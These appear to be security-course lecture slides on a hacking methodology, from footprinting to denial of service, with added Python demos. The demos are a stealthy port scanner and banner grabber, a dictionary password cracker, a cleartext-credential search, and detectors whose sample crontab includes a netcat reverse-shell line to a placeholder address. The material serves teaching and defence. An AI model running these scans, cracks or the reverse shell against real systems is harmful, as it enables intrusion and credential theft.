Slide 1 (cs591 chow): Hacking Methodology (Steps)

An excellent description is printed inside the back cover of the "Hacking Exposed" text by McClure et al. The steps, in order, with representative tools for each:

Footprinting: whois, nslookup
Scanning: nmap, fping
Enumeration: DumpACL, showmount, legion, rpcinfo
Gaining Access: tcpdump, L0phtcrack, NAT
Escalating Privilege: John the Ripper, getadmin
Pilfering: rhosts, user data, config files, registry
Covering Tracks: zap, rootkits
Creating Back Doors: cron, at, startup folder, netcat, keystroke logger, remote desktop
Denial of Service: synk4, ping of death, tfn/stacheldraht
Slide 2: Footprinting

Information gathering. Sam Spade is a Windows-based network query tool. Find out the target's IP address range and phone number range (why check phone numbers?), acquire its namespace, and map its network topology (VisualRoute). This step is essential to a "surgical" attack; the key is not to miss any details. Note that for a penetration tester this step serves to avoid testing someone other than your client, and to include all the systems that are to be tested (sometimes the organization will not tell you what its systems consist of). Defense: deploy a NIDS (Snort), RotoRouter.

Techniques and tools:
Open source search: Google and other search engines, EDGAR
Find domain name, admin contact, IP addresses, name servers: whois (Network Solutions; ARIN)
DNS zone transfer: nslookup (ls -d), dig, Sam Spade
Slide 3: Scanning

Bulk target assessment: which machines are up and which ports (services) are open, so that the attack can focus on the most promising avenues of entry. To avoid being detected, these tools can reduce the rate at which packets are sent and randomize the order in which ports or IP addresses are scanned. Note that some machines do not respond to ping but do respond to requests to ports that are actually open; Ardor is an example.

Techniques and tools:
Ping sweep: fping, icmpenum, WS_Ping ProPack, nmap
TCP/UDP port scan: nmap, SuperScan, fscan
OS detection: nmap, queso, siphon
Slide 4: Enumeration

Identify valid user accounts or poorly protected resource shares. This is more intrusive probing than the scanning step.

Techniques and tools:
List user accounts: null sessions, DumpACL, sid2user, OnSite Admin
List file shares: showmount, NAT, legion
Identify applications: banner grabbing with telnet or netcat, rpcinfo, netcat
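The scanning and enumeration slides describe a sequence (throttled, randomized port probing, then banner grabbing on what is open) without showing it. The following is an added example, not code from the slides or from any of the listed tools: a TCP connect() scan followed by netcat-style banner grabbing and a crude service fingerprint. The "services" it probes are constructed stand-ins started on loopback ports inside the script; the banner strings, ports and the HOST name are assumptions for the demo.

```python
import random
import socket
import threading
import time

HOST = "127.0.0.1"  # assumption: the demo scans its own loopback services


def start_banner_service(banner: bytes) -> int:
    """Constructed stand-in for a real daemon: accept connections on a free
    loopback port and send a fixed banner. Returns the port number."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((HOST, 0))
    srv.listen(16)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass  # the scanner closed without reading; keep serving

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def free_port() -> int:
    """A port that is (almost certainly) closed: bind, read it back, release it."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((HOST, 0))
        return s.getsockname()[1]


def connect_scan(host, ports, delay=0.0, randomize=True, timeout=0.5):
    """TCP connect() scan. The port order is shuffled and a delay is inserted
    between probes so the scan does not look like a sequential sweep to an IDS.
    No ping sweep gates the scan: a host that drops ICMP still answers on its
    open ports (the slide's point), so every listed port is probed."""
    order = list(ports)
    if randomize:
        random.shuffle(order)
    open_ports = []
    for port in order:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
        if delay:
            time.sleep(delay)
    return sorted(open_ports)


def grab_banner(host, port, probe=b"", timeout=1.0, max_bytes=512) -> str:
    """Banner grab as with `nc host port`: connect, optionally send a probe
    (e.g. b"HEAD / HTTP/1.0\\r\\n\\r\\n" for a web server that says nothing
    unprompted), and read whatever the service volunteers."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        try:
            data = s.recv(max_bytes)
        except socket.timeout:
            data = b""
    return data.decode("ascii", "replace").strip()


def fingerprint(banner: str) -> str:
    """Crude application identification from the first banner line."""
    first = banner.split("\n", 1)[0].strip().lower()
    if first.startswith("ssh-"):
        return "ssh"
    if first.startswith("220") and "smtp" in first:
        return "smtp"
    if first.startswith("http/"):
        return "http"
    return "unknown"


def scan_and_enumerate(host, ports, delay=0.0):
    """Scan, then enumerate each open port: {port: (service, banner)}."""
    results = {}
    for port in connect_scan(host, ports, delay=delay):
        banner = grab_banner(host, port)
        results[port] = (fingerprint(banner), banner)
    return results


if __name__ == "__main__":
    ssh = start_banner_service(b"SSH-2.0-OpenSSH_7.4\r\n")
    smtp = start_banner_service(b"220 mail.example.test ESMTP Sendmail 8.9.3\r\n")
    for port, (svc, banner) in scan_and_enumerate(HOST, [ssh, free_port(), smtp], delay=0.2).items():
        print(f"{port}/tcp open  {svc:8s} {banner}")
```

The same steps with the slide's tools: `nmap -sT -T2 --randomize-hosts -Pn` gives the throttled, randomized connect scan without a ping gate, and `nmap -sV` or `nc host port` does the banner grab; connect() scans complete the handshake and therefore show up in the target's service logs, which is why stealthier half-open scans exist.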
Slide 5: Gaining Access

Based on the information gathered so far, make an informed attempt to access the target.

Techniques and tools:
Password eavesdropping: tcpdump/ssldump, L0phtcrack (readsmb)
File share brute forcing: NAT, legion
Password file grab: tftp, pwdump2 (NT)
Buffer overflow: ttdb, bind, IIS .HTR/ISM.DLL
Slide 6: Escalating Privilege

If only user-level access was obtained in the last step, seek to gain complete control of the system.

Techniques and tools:
Password cracking: John the Ripper, L0phtcrack
Known exploits: lc_messages, getadmin, sechole
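Slides 5 and 6 name the password-file grab and offline cracking (pwdump2, John the Ripper, L0phtcrack) but not what the cracker actually does. The following is an added example, not code from the slides or from those tools: a dictionary attack with a small wordlist-mangling rule set against a dump of unsalted hashes. The hash function is an assumed stand-in (SHA-256 of the password) for the unsalted NT/LM hashes the real tools target; the sample accounts, passwords and wordlist are constructed for the demo.

```python
import hashlib
from collections import defaultdict


def hash_password(password: str) -> str:
    """Assumption: an unsalted stand-in for the NT/LM hash. Real crackers
    implement the Windows algorithms; what matters here is the lack of salt."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def mangle(word: str):
    """Wordlist rules in the spirit of John the Ripper's rule engine:
    case changes, reversal, a little leetspeak, then common suffixes."""
    base = {word, word.capitalize(), word.upper(), word[::-1]}
    leet = word.replace("a", "4").replace("e", "3").replace("o", "0").replace("i", "1")
    base.add(leet)
    for w in list(base):
        yield w
        for suffix in ("1", "12", "123", "!", "2000"):
            yield w + suffix


def crack(hashes: dict, wordlist) -> dict:
    """Dictionary attack against unsalted hashes. With no salt, each candidate
    is hashed once and looked up against every user's digest at the same time;
    a salted scheme would force one hash computation per user per candidate.
    Returns {user: cleartext} for every account cracked."""
    by_digest = defaultdict(list)
    for user, digest in hashes.items():
        by_digest[digest].append(user)
    cracked = {}
    for word in wordlist:
        for cand in mangle(word):
            for user in by_digest.get(hash_password(cand), ()):
                cracked.setdefault(user, cand)
            if len(cracked) == len(hashes):
                return cracked
    return cracked


# Constructed hash dump (hypothetical users and passwords).
SAMPLE_HASHES = {
    "alice": hash_password("Summer123"),
    "bob": hash_password("p4ssw0rd"),
    "carol": hash_password("xK9#vQ2!mLp"),   # not derivable from the wordlist
    "dave": hash_password("Summer123"),      # same password as alice: one lookup cracks both
}
WORDLIST = ["password", "summer", "letmein", "admin", "welcome"]

if __name__ == "__main__":
    for user, pw in crack(SAMPLE_HASHES, WORDLIST).items():
        print(f"{user}: {pw}")
```

Two users sharing a password fall together from a single hash computation, which is the property that makes unsalted LM/NT dumps so cheap to crack; carol survives only because her password is not a rule-mangled dictionary word.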
Slide 7: Pilfering

Pilfer (Webster's Revised Unabridged Dictionary, 1913): v. i. [imp. & p. p. Pilfered; p. pr. & vb. n. Pilfering.] [OF. pelfrer. See Pelf.] To steal in small quantities, or articles of small value; to practice petty theft.

Gather information that identifies mechanisms allowing access to trusted systems.

Techniques and tools:
Evaluate trusts: rhosts, LSA secrets
Search for cleartext passwords: user data, configuration files, registry
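The two pilfering techniques above are both searches through files on the compromised host. The following is an added example, not code from the slides: it evaluates .rhosts/hosts.equiv trust entries for wildcard ('+') trust and greps configuration-style files for credential-looking keys. The .rhosts contents, file paths and values are constructed for the demo and are not real systems.

```python
import re

# Constructed ~/.rhosts of a compromised account (hypothetical hosts).
SAMPLE_RHOSTS = """\
# hosts trusted for rlogin/rsh without a password
trusted.corp.example   ops
+ +
buildbox   +
"""

# Constructed config files (hypothetical paths and values).
SAMPLE_FILES = {
    "/etc/app/db.conf": "db.host=10.0.0.5\ndb.user=app\ndb.password=Sup3rS3cret\n",
    "/home/ops/.netrc": "machine ftp.example.test login ops password hunter2\n",
    "/etc/app/web.ini": "[http]\nlisten=0.0.0.0:8080\ncache=on\n",
}


def evaluate_rhosts(text: str):
    """Parse .rhosts / hosts.equiv lines ("host [user]") and report wildcard
    trust: '+' in the host field trusts every host, '+' in the user field
    trusts every user on that host. Returns [(lineno, description)]."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        host, user = fields[0], (fields[1] if len(fields) > 1 else None)
        if host == "+" and user == "+":
            findings.append((lineno, "any user from any host"))
        elif host == "+":
            findings.append((lineno, f"user {user} from any host"))
        elif user == "+":
            findings.append((lineno, f"any user from {host}"))
    return findings


# Matches key=value, key: value, and netrc-style "password value".
CRED_RE = re.compile(r"(?i)\b(password|passwd|pwd|secret|token)\b\s*[=:\s]\s*(\S+)")


def find_cleartext_credentials(files: dict):
    """Scan file contents for credential-looking keys.
    Returns [(path, lineno, key, value)]."""
    hits = []
    for path, content in files.items():
        for lineno, line in enumerate(content.splitlines(), 1):
            m = CRED_RE.search(line)
            if m:
                hits.append((path, lineno, m.group(1).lower(), m.group(2)))
    return hits


if __name__ == "__main__":
    for lineno, what in evaluate_rhosts(SAMPLE_RHOSTS):
        print(f".rhosts line {lineno}: trusts {what}")
    for path, lineno, key, value in find_cleartext_credentials(SAMPLE_FILES):
        print(f"{path}:{lineno}: {key} = {value}")
```

A "+ +" entry is the classic finding: any user on any host can rlogin as that account without a password, so a single compromised account turns into a trust path to every machine whose .rhosts lists it.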
Slide 8: Covering Tracks

Once total ownership of the target is secured, hiding this fact from the system administrators becomes paramount, lest they quickly end the romp.

Techniques and tools:
Clear logs: zap, Event Log GUI
Hide tools: rootkits, file streaming
Slide 9: Creating Back Doors

Trap doors are laid in various parts of the system to ensure that privileged access is easily regained whenever the intruder decides.

Techniques and tools:
Create rogue user accounts: members of wheel, admin
Schedule batch jobs: cron, at
Infect startup files: rc, startup folder, registry keys
Plant remote control services: netcat, remote.exe, VNC, BO2K, remote desktop
Install monitoring mechanisms: keystroke loggers, add an account to the secadmin mail aliases
Replace applications with Trojans: login, fpnwclnt.dll
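The rogue-account and scheduled-job backdoors above are also the easiest to audit for. The following is an added example, not code from the slides: it lists every UID-0 account other than root in a passwd file and flags system-crontab jobs that run from temp directories or look like netcat reverse shells. The passwd and crontab contents, paths and addresses are constructed for the demo.

```python
import re

# Constructed /etc/passwd with a second UID-0 account added by an intruder.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
ops:x:1000:1000:ops:/home/ops:/bin/bash
toor:x:0:0:backup operator:/root:/bin/bash
"""

# Constructed /etc/crontab (system format: minute hour dom month dow user command).
SAMPLE_CRONTAB = """\
# /etc/crontab
0 2 * * * root /usr/bin/backup --all
*/5 * * * * root /tmp/.x/nc -e /bin/sh 203.0.113.7 4444
@reboot root /var/tmp/.update.sh
30 4 * * 0 root /usr/sbin/logrotate /etc/logrotate.conf
"""

TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# netcat with -e, bash /dev/tcp redirection, or an interactive bash
SHELL_RE = re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s|/dev/tcp/|bash\s+-i")


def rogue_uid0_accounts(passwd_text: str):
    """Every account with UID 0 other than root: a classic rogue-account backdoor."""
    rogue = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            rogue.append(fields[0])
    return rogue


def parse_system_crontab(text: str):
    """Yield (lineno, schedule, user, command) for each job line; handles both
    five-field schedules and @reboot-style keywords."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 2) if line.startswith("@") else line.split(None, 6)
        if len(parts) < 3:
            continue
        yield lineno, " ".join(parts[:-2]), parts[-2], parts[-1]


def suspicious_cron_entries(text: str):
    """Flag jobs that run from temp directories or look like reverse shells.
    Returns [(lineno, user, command, [reasons])]."""
    flagged = []
    for lineno, _schedule, user, command in parse_system_crontab(text):
        reasons = []
        if any(d in command for d in TEMP_DIRS):
            reasons.append("runs from temp dir")
        if SHELL_RE.search(command):
            reasons.append("reverse shell")
        if reasons:
            flagged.append((lineno, user, command, reasons))
    return flagged


if __name__ == "__main__":
    print("extra UID-0 accounts:", rogue_uid0_accounts(SAMPLE_PASSWD))
    for lineno, user, command, reasons in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"crontab line {lineno} ({user}): {command}  <- {', '.join(reasons)}")
```

The same checks belong on the other persistence points the slide lists (at jobs, rc scripts, the Startup folder and Run registry keys); a baseline taken before the compromise is what makes the diff meaningful.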
Slide 10: Denial of Service

If the attacker is unsuccessful in gaining access, they may use readily available exploit code to disable the target as a last resort.

Techniques and tools:
SYN flood: synk4
ICMP techniques: ping of death, smurf
Identical src/dst SYN requests: land, latierra
Overlapping fragment/offset bugs: (no tools listed on the slide)
Out-of-bounds TCP options (OOB): (no tools listed on the slide)
DDoS: trinoo, TFN, stacheldraht
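Three of the attacks listed above (SYN flood, LAND's identical src/dst SYN, smurf's echo requests to a broadcast address) have distinctive signatures in a packet capture. The following is an added example, not code from the slides or from any of the tools named: detection logic run over constructed packet summaries of the kind one would pull from tcpdump output. The addresses, ports, counts and the 50-half-open threshold are assumptions for the demo.

```python
from collections import Counter


def tcp(src, sport, dst, dport, flags):
    return {"proto": "tcp", "src": src, "sport": sport, "dst": dst, "dport": dport, "flags": flags}


def icmp(src, dst, kind):
    return {"proto": "icmp", "src": src, "dst": dst, "type": kind}


def build_sample_capture():
    """Constructed packet summaries (documentation-range addresses, not a real capture)."""
    pkts = []
    # two legitimate clients completing the handshake with the web server
    for sport in (40000, 40001):
        pkts.append(tcp("198.51.100.5", sport, "192.0.2.10", 80, "S"))
        pkts.append(tcp("198.51.100.5", sport, "192.0.2.10", 80, "A"))
    # SYN flood: 60 SYNs from spoofed sources that never complete the handshake
    for i in range(60):
        pkts.append(tcp(f"203.0.113.{i + 1}", 1024 + i, "192.0.2.10", 80, "S"))
    # LAND: source address and port equal the destination address and port
    pkts.append(tcp("192.0.2.10", 139, "192.0.2.10", 139, "S"))
    # smurf: echo request to a directed broadcast, source spoofed to the victim
    pkts.append(icmp("192.0.2.10", "192.0.2.255", "echo-request"))
    pkts.append(icmp("198.51.100.5", "192.0.2.10", "echo-request"))  # an ordinary ping
    return pkts


def detect_land(packets):
    """LAND packets: a SYN whose src/sport equal its dst/dport."""
    return [p for p in packets if p["proto"] == "tcp" and "S" in p["flags"]
            and p["src"] == p["dst"] and p["sport"] == p["dport"]]


def detect_smurf(packets, broadcast_addrs):
    """Echo requests aimed at a broadcast address; the spoofed src is the victim."""
    return [p for p in packets if p["proto"] == "icmp" and p["type"] == "echo-request"
            and p["dst"] in broadcast_addrs]


def detect_syn_flood(packets, threshold=50):
    """Count SYNs per (src, sport, dst, dport) that are never followed by an ACK
    from the same source, aggregate the half-open attempts per target, and
    report targets at or above the threshold as {(dst, dport): count}."""
    syns = Counter()
    completed = set()
    for p in packets:
        if p["proto"] != "tcp":
            continue
        key = (p["src"], p["sport"], p["dst"], p["dport"])
        if p["flags"] == "S":
            syns[key] += 1
        elif "A" in p["flags"]:
            completed.add(key)
    half_open = Counter()
    for key, n in syns.items():
        if key not in completed:
            half_open[(key[2], key[3])] += n
    return {target: n for target, n in half_open.items() if n >= threshold}


if __name__ == "__main__":
    pk = build_sample_capture()
    print("SYN flood targets:", detect_syn_flood(pk))
    print("LAND packets:", len(detect_land(pk)))
    print("smurf packets:", len(detect_smurf(pk, {"192.0.2.255"})))
```

The flood detector keys on the missing third handshake packet rather than on raw SYN rate, so a busy but healthy server does not trip it; the LAND packet is also a lone half-open SYN, which is why it stays below the flood threshold and needs its own check.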